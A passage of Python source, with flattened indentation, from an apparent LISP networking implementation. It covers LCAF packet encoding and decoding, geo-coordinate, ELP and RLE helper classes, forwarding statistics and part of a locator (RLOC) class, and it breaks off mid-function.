if (iid is 0 and mask_len is 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
